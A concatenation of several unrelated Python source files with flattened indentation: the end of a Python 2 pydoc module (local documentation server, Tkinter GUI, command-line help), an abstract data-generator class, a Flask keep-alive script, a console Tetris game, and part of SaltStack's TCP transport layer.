def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
data_generator.py
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import threading
import time
from abc import ABC, abstractmethod
class DataGenerator(ABC):
"""
This class is an abstraction of a data generator which generates all kinds of data
and stores them at give location (local, cloud, etc.)
It maintains details such as start time, timeout value, etc. and is responsible for
starting the task process, monitoring the status, ending the task at the correct
time and cleaning up the process properly when terminated.
"""
def __init__(self, timeout: float = -1) -> None:
self._finished = False
self._started = False
self.start_time = time.time()
self.timeout = (
timeout
) # in minutes, -1 if no timeout is set (run indefinitely until killed by runner)
@abstractmethod
def run(self) -> None:
"""
This method must be implemented by subclass.
The logic of how the data is generated should be put here.
"""
raise NotImplementedError()
def start(self, *args) -> None:
"""
Start a separate thread which call run() fn and keep running util terminated
"""
if not self._started:
self.start_time = time.time()
thread = threading.Thread(target=self.run, args=(args))
thread.daemon = True
thread.start()
self._started = True
def set_finished(self, finished: bool = True) -> None:
"""
Set task finish status
"""
self._finished = finished
def check_is_finished(self) -> bool:
"""
Return if the task has finished
"""
return self._finished
def check_is_timeout(self) -> bool:
"""
Return if the task has timed out
"""
if self.timeout == -1:
return False
if time.time() - self.start_time < self.timeout * 60:
return False
return True
def get_remaining_time(self) -> float:
"""
Return remaining time before task timeout
"""
return self.timeout - ((time.time() - self.start_time) // 60)
|
runner.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home() :
return "Hogwarts' Hat"
def run () :
app.run(host='0.0.0.0',port="8080")
def alive() :
t = Thread(target=run)
t.start()
|
main.py
|
from tetris import *
from random import *
import threading
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
def rotate(m_array, rot_num):
N = len(m_array)
rot_m = [[0] * N for _ in range(N)]
if rot_num % 4 == 1:
for i in range(N):
for j in range(N):
rot_m[j][N-1-i] = m_array[i][j]
elif rot_num % 4 == 2:
for i in range(N):
for j in range(N):
rot_m[N-1-i][N-1-j] = m_array[i][j]
elif rot_num % 4 == 3:
for i in range(N):
for j in range(N):
rot_m[N-1-j][i] = m_array[i][j]
else:
for i in range(N):
for j in range(N):
rot_m[i][j] = m_array[i][j]
return rot_m
def initSetOfBlockArrays():
arrayBlks = [ [ [ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ] ], # ㅁ
[ [0, 1, 0],
[1, 1, 1], # ㅗ
[0, 0, 0] ],
[ [1, 0, 0],
[1, 1, 1], # ㄴ
[0, 0, 0] ],
[ [0, 0, 1], # ㅁ
[1, 1, 1], # ㅁㅁㅁ
[0, 0, 0] ], #
[ [1, 1], # ㅁ
[1, 1] ],
[ [0, 1, 1], # ㅁㅁ
[1, 1, 0], # ㅁㅁ
[0, 0, 0] ], #
[ [1, 1, 0], # ㅁㅁ
[0, 1, 1], # ㅁㅁ
[0, 0, 0] ] #
]
nBlocks = len(arrayBlks)
setOfBlockArrays = [[0] * 4 for _ in range(nBlocks)]
for idxBlockType in range(nBlocks):
for idxBlockDegree in range(4):
rotate_matrix = rotate(arrayBlks[idxBlockType], idxBlockDegree)
setOfBlockArrays[idxBlockType][idxBlockDegree] = rotate_matrix
return setOfBlockArrays
if __name__ == "__main__":
#LED_init()
setOfBlockArrays = initSetOfBlockArrays()
Tetris.init(setOfBlockArrays)
board = Tetris(32, 16)
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
board.accept(key)
board.printScreen()
while (1):
key = input('Enter a key from [ q (quit), a (left), d (right), s (down), w (rotate), \' \' (drop) ] : ')
if key != 'q':
state = board.accept(key)
board.printScreen()
if(state == TetrisState.NewBlock):
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
state = board.accept(key)
if(state == TetrisState.Finished):
board.printScreen()
print('Game Over!!!')
break
board.printScreen()
else:
print('Game aborted...')
break
print('Program terminated...')
### end of pytet.py
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import time
import traceback
import urllib.parse as urlparse
import weakref
import salt.crypt
import salt.exceptions
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
from salt.transport import iter_transport_opts
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
state["socket_queue"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"socket_queue": self.socket_queue,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to tcp.
Note: this class returns a singleton
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncTCPReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncTCPReqChannel for %s", key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if "master_uri" in kwargs:
opts["master_uri"] = kwargs["master_uri"]
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
opts["master_uri"],
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get("resolver")
parse = urlparse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={
"io_loop": self.io_loop,
"resolver": resolver,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_ret_port"),
},
)
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
"""
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(
self._package_load(load), timeout=timeout, tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
try:
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except salt.ext.tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError("Connection to master lost")
raise salt.ext.tornado.gen.Return(ret)
class AsyncTCPPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
async_methods = [
"send_id",
"connect_callback",
"connect",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.message_client = None
self.event = salt.utils.event.get_event("minion", opts=self.opts, listen=False)
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
if self.event is not None:
self.event.destroy()
self.event = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def send_id(self, tok, force_auth):
"""
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
"""
load = {"id": self.opts["id"], "tok": tok}
@salt.ext.tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise salt.ext.tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while (
count <= self.opts["tcp_authentication_retries"]
or self.opts["tcp_authentication_retries"] < 0
):
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event({"master": self.opts["master"]}, "__master_connected")
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get("__role") == "syndic":
data = "Syndic {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "syndic")
else:
data = "Minion {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "minion")
load = {
"id": self.opts["id"],
"cmd": "_minion_event",
"pretag": None,
"tok": self.tok,
"data": data,
"tag": tag,
}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,), loop_kwarg="io_loop",
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info(
"fire_master failed: master could not be contacted. Request timed out."
)
except Exception: # pylint: disable=broad-except
log.info("fire_master failed: %s", traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event({"master": self.opts["master"]}, "__master_disconnected")
@salt.ext.tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b"salt")
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4505)) != 4505:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts["master_ip"], int(self.publish_port)),
kwargs={
"io_loop": self.io_loop,
"connect_callback": self.connect_callback,
"disconnect_callback": self.disconnect_callback,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_publish_port"),
},
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt: # pylint: disable=try-except-raise
raise
except Exception as exc: # pylint: disable=broad-except
if "-|RETRY|-" not in str(exc):
raise SaltClientError(
"Unable to sign_in to master: {}".format(exc)
) # TODO: better error message
def on_recv(self, callback):
"""
Register an on_recv callback
"""
if callback is None:
return self.message_client.on_recv(callback)
@salt.ext.tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we did, because the req_server is also handling this socket, when we call
# req_server.stop(), tornado will give us an AssertionError because it's trying to
# match the socket.fileno() (after close it's -1) to the fd it holds on it's _sockets cache
# so it can remove the socket from the IOLoop handlers
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
# pylint: disable=W1701
